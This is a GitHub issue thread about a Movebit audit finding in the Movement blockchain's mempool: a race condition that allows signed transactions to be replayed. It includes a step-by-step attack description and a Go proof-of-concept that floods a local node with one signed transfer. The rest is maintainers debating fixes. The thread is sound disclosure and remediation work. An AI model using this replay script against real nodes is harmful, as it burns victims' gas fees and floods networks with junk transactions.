LIB1-1 Multithreading Issue Leads to Transaction Replay Vulnerability

SA124 commented 3 weeks ago

LIB1-1 Multithreading Issue Leads to Transaction Replay Vulnerability Auditor: Movebit Code: Aptos Core Severity: Critical Discovery Methods: Manual Review Status: Pending Code Location: protocol-units/mempool/util/src/lib.rs#50; protocol-units/da/m1/light-node/src/v1/sequencer.rs#76; networks/suzuka/suzuka-full-node/src/partial.rs#134

Descriptions: In the light-node, when adding a transaction to the mempool, the mempool_util::MempoolTransactionOperations::add_transaction function is called, as shown below:

This function checks whether the transaction already exists to prevent replay attacks. However, this check can be bypassed. The tick_write_transactions_to_da thread of the full-node is responsible for writing transactions to the mempool, while the run_block_proposer thread is responsible for popping transactions out of the mempool and sending them to the DA. If a transaction A is popped out, it no longer exists in the mempool, and it can be re-added to the mempool. The prerequisite for this attack is that transaction A has not yet been executed, but this condition is easily met because the speed of writing to the mempool is faster than the speed of executing blocks. Impact: Under normal circumstances, repeated transactions that are packaged into a block will not execute successfully but will consume gas fees. A third-party attacker can exploit this by replaying a large number of user transactions, resulting in asset loss for the victim.

Suggestion: The fix is quite complex, it is recommended to refer to Aptos's replay prevention mechanism. A simple approach could be to revalidate transactions when packaging a block after the execution of a block.

l-monninger commented 3 weeks ago

Because of the sequence numbers, you shouldn't be able to actually replay transactions here by the time VM execution occurs.

And, ultimately, that's where such replay prevention has to take place. Fundamentally, transaction ingress through to execution QC can't itself be synchronized throughout the network unless CAP tradeoffs are CP. That is, even if you had synchronized the mempool to regard inflight transactions for a single node, you couldn't have guarantees about the mempools of other nodes without being CP.

However, you can still use this gap to attempt DOS. I think it would be difficult, however, in our current setup to run this through a single node because we don't actually pop transactions out of the mempool when piping through to block building. Instead, we only garbage collect which currently takes place on a fixed interval appropriate for block execution speed.

Over multiple nodes, this remains an vector for a DOS attack and may add credence to #339 . However, we could asses whether the validation performed at the VM-level is already performant enough--as the solution would involve tracking transactions in a similar manner.

poetyellow commented 3 weeks ago

Our audit is based on the 030fe011da8bd7eca75fa0a37197205767bef7ec commit. Based on our audit, we have the following preliminary knowledge:

The entire Movement architecture has two mempools: one is Aptos built-in CoreMemoryPool, and the other is the light-node's RocksdbMempool.
The verification process for Movement transactions consists of the following steps: a. vm_validator.validate_transaction(): Validates that a transaction's sequence_number is higher than the current db_sequence_number. b. core_mempool.add_txn(): Validates that a transaction's sequence_number is higher than the current db_sequence_number. c. executor.execute_block(): Validates that a transaction's sequence_number must be db_sequence_number + 1.
executor.execute_block() executes in blocks, meaning that even if the transactions within do not pass validation, they will still be saved to the database along with the block.
Under normal circumstances, after executor.execute_block() is executed, the sender’s gas fee will be deducted for transactions that did not pass validation because the node needs disk space to store illegal transactions. (Of course, there is a vulnerability here where the gas fee is not deducted; see https://github.com/movementlabsxyz/movement/issues/409)

Therefore, we can exploit this race condition vulnerability to launch an attack:

First, we know that Movement packages 10 transactions within 1 seconds.
Suppose attacker A obtains a transaction Tx1 from victim V.
The victim sends the first Tx1, and then within 1 seconds, the attacker sends 9 more copies of Tx1.
These 10 identical transactions will pass the vm_validator.validate_transaction() and core_mempool.add_txn() validations and will be packaged into a block.
During the executor.execute_block() phase, only the first Tx will be successfully executed, while the other 9 will fail. Even if they fail, these 9 transactions will still be included in the block and stored, and the gas fee will be deducted from victim V.
During this attack, attacker A incurs no cost, as he can simply replay transactions he is aware of without any conditions.
Due to the existence of vulnerability https://github.com/movementlabsxyz/movement/issues/409, the gas fee will not be deducted multiple times while the vulnerability is unpatched. However, these failed transactions will still be stored locally in the node, consuming storage space and generating junk transactions. If vulnerability https://github.com/movementlabsxyz/movement/issues/409 is patched, the impact will be that victim V's gas fee will be deducted multiple times.

We have verified through a locally deployed test environment that the replay transaction issue exists.

l-monninger commented 2 weeks ago

These 10 identical transactions will pass the vm_validator.validate_transaction() and core_mempool.add_txn() validations and will be packaged into a block.

They will not be packaged into a block if they are identical. Blocks have B-Tree Sets as their transaction container. At some point during ingress, serialization, or deserialization, duplicates will be removed by honest nodes.

l-monninger commented 2 weeks ago

Would you be able to share the scripts and configuration of your local environment?

l-monninger commented 2 weeks ago

This can happen if the transactions are included in different blocks, which could be achieved via particular timing or sending to different nodes.

l-monninger commented 2 weeks ago

So, when we turn on #409 we will have to have solved this.

l-monninger commented 2 weeks ago

via particular timing

The particular timing here would presumably need to be that the transaction has been garbage collected, but not yet executed--since we don't pop transactions out of the mempool.

poetyellow commented 2 weeks ago

Hi, we build a docker environment based on the 030fe011da8bd7eca75fa0a37197205767bef7ec commit.

poetyellow commented 2 weeks ago

package main

import (
    "bytes"
    "encoding/json"
    "fmt"
    "io"
    "log"
    "net/http"
    "sync"
    "time"
)

const url = "http://127.0.0.1:30731/v1/transactions"

var requestPayload = map[string]interface{}{
    "sender":                    "0x60b5f67bb14334b371f207df24d6f717e50941a67f84db471d661de5140e23c9",
    "sequence_number":           "0",
    "max_gas_amount":            "1498",
    "gas_unit_price":            "100",
    "expiration_timestamp_secs": "1755253215",
    "payload": map[string]interface{}{
        "function":       "0x1::aptos_account::transfer",
        "type":           "entry_function_payload",
        "type_arguments": []interface{}{},
        "arguments": []interface{}{
            "0x60b5f67bb14334b371f207df24d6f717e50941a67f84db471d661de5140e23c8",
            "100",
        },
    },
    "signature": map[string]interface{}{
        "type":       "ed25519_signature",
        "public_key": "0x18367b2687ee313cc3baea86d31619e5bef1158df4bb0f6d2476a9601e978ae2",
        "signature":  "0x771e15db6f57c9793db583e8a4cbe13d1a95ca47f1fcf375adb0728abc5f8b77a43de5a20bf699876d63f78418f87c257717dc5a0a24789af0ec79c1cf13af0f",
    },
}

var requestPayload2 = map[string]interface{}{
    "sender":                    "0x60b5f67bb14334b371f207df24d6f717e50941a67f84db471d661de5140e23c9",
    "sequence_number":           "2",
    "max_gas_amount":            "13",
    "gas_unit_price":            "100",
    "expiration_timestamp_secs": "1755308158",
    "payload": map[string]interface{}{
        "function":       "0x1::aptos_account::transfer",
        "type":           "entry_function_payload",
        "type_arguments": []interface{}{},
        "arguments": []interface{}{
            "0x60b5f67bb14334b371f207df24d6f717e50941a67f84db471d661de5140e23c8",
            "100",
        },
    },
    "signature": map[string]interface{}{
        "type":       "ed25519_signature",
        "public_key": "0x18367b2687ee313cc3baea86d31619e5bef1158df4bb0f6d2476a9601e978ae2",
        "signature":  "0x45e9e00617dc0af6160412bada9588853e4a9cb7aea893e202efcfc37c735d9233b108f61b889e0a46e81860554df68611b807db24550efb5051e96617465503",
    },
}

func sendRequest(wg *sync.WaitGroup, requestPayload map[string]interface{}, i int) {
    defer wg.Done()

    jsonData, err := json.Marshal(requestPayload2)
    if err != nil {
        log.Println("Error marshalling JSON:", err)
        return
    }

    resp, err := http.Post(url, "application/json", bytes.NewBuffer(jsonData))
    if err != nil {
        log.Println("Error sending request:", err)
        return
    }
    defer resp.Body.Close()

    body, err := io.ReadAll(resp.Body)
    if err != nil {
        log.Println("Error reading response body:", err)
        return
    }
    // fmt.Printf("Response Status: %s\n", resp.Status)
    fmt.Printf("%d Response Body: %s\n", i, body)
}

func main() {
    var wg sync.WaitGroup
    numRequests := 200000000

    for i := 0; i < numRequests; i++ {
        wg.Add(1)
        time.Sleep(100 * time.Millisecond)
        go sendRequest(&wg, requestPayload, i)
    }

    wg.Wait()
}

poetyellow commented 2 weeks ago

The above Golang source code is the attacking code.

poetyellow commented 2 weeks ago

These 10 identical transactions will pass the vm_validator.validate_transaction() and core_mempool.add_txn() validations and will be packaged into a block.

They will not be packaged into a block if they are identical. Blocks have B-Tree Sets as their transaction container. At some point during ingress, serialization, or deserialization, duplicates will be removed by honest nodes.

Hello,

This is the Tx in the light-node Mempool:

pub struct MempoolTransaction {
    pub transaction: Transaction,
    pub timestamp: u64,
    pub slot_seconds: u64,
}

The replay Tx is :

pub struct Transaction {
    pub data: Vec<u8>,
    pub sequence_number: u64,
    pub id: Id,
}

The Block is :

pub struct Block {
    pub metadata: BlockMetadata,
    pub parent: Vec<u8>,
    pub transactions: Vec<Transaction>,
    pub id: Id,
}

There is no B-Tree Set .

l-monninger commented 2 weeks ago

@poetyellow

My bad I guess that must have been factored out at some point. It also looks like the usage of a BTreeSet in the Memseq in-memory buffer, along with whole buffer, is no longer extant despite a lingering comment.

The other thing is that RocksDB uniqueness doesn't help us here because we are creating a key from the wrapped mempool transaction: https://github.com/movementlabsxyz/movement/blob/31386f74a2700920fec093775c221acdc9c6c7a2/protocol-units/mempool/move-rocks/src/lib.rs#L37

I believe the safety of each of the approaches alluded to in this thread is something like:

A Memseq key uniqueness approach only prevents this attack from occurring via transactions sent through the same node, or strictly, the same move-rocks pool.
The BTreeSet approach will account for the replay attack when the replay transactions would be placed in the same block, but not across blocks.
DB-based validation after passing through the DA is safe w.r.t. this issue, but opens up more potential for DOS. We can get the transaction by hash from the AptosDB it will have been called here during execution if the transactions was previously included, we could filter these out of the blocks. I need to double-check if the VM is already doing this, if so, we can just use the BTreeSet to make sure it doesn't happen within a block. The problem is, however, that you're still doing a fair bit of work on every node for this transaction. Per my comment about CP earlier though, I don't think there's a good way around this. The best thing to do would probably be position the mempool for independent scaling. We are also fundamentally accepting a fair bit of DOS risk by using a permissionless, public DA in the first place. So, some tolerance for this risk is presumed.

l-monninger commented 2 weeks ago

@mzabaluev Going to move some of this over to our #475 while we're undecided on the best course of action here.

mzabaluev commented 1 week ago

The above Golang source code is the attacking code.

I think this needs cleanup. requestPayload2 is the actual request that gets sent repeatedly while requestPayload is ignored, is it how it should be?

mzabaluev commented 1 week ago

3. DB-based validation after passing through the DA is safe w.r.t. this issue, but opens up more potential for DOS.

I have filed #526 to check if we can avoid this.

mzabaluev commented 1 week ago

3. We can get the transaction by hash from the AptosDB it will have been called here during execution if the transactions was previously included, we could filter these out of the blocks.

Would transaction look up be sufficient with pruning enabled? If an attacker sends a sufficiently old transaction, it would have been pruned from the DB.

l-monninger commented 1 week ago

Would transaction look up be sufficient with pruning enabled? If an attacker sends a sufficiently old transaction, it would have been pruned from the DB.

In theory, by this point, the account sequence number check in the mempool is sufficient.

l-monninger commented 1 week ago

The only reason to use the transaction_by_hash instead of account_sequence_number for the filtering is that you might want to charge and deter the honest user for trying to aggressively send transactions that are close to the correct sequence number. You can do this by letting those transactions through the very first time to have them aborted in the VM.

Later on, i.e., after pruning. The mempool would check the account sequence number and deny these transactions up front. It loses the deterrence aspect. But, based on how far off their sequence number is, it's more likely these transactions are just purely fraudulent.

mzabaluev commented 1 week ago

Thanks @l-monninger. I agree the transaction_by_hash check will solve the replay problem at some added runtime cost.

This bit looks like it should be teachable to the users:

you might want to charge and deter the honest user for trying to aggressively send transactions that are close to the correct sequence number.

l-monninger commented 1 day ago

I believe #542 and #502 resolve this, though we still need to recreate the test in our test harness. @poetyellow should we reach out in another in a separate channel about re-reviewing?

movementlabsxyz / movement

LIB1-1 Multithreading Issue Leads to Transaction Replay Vulnerability #416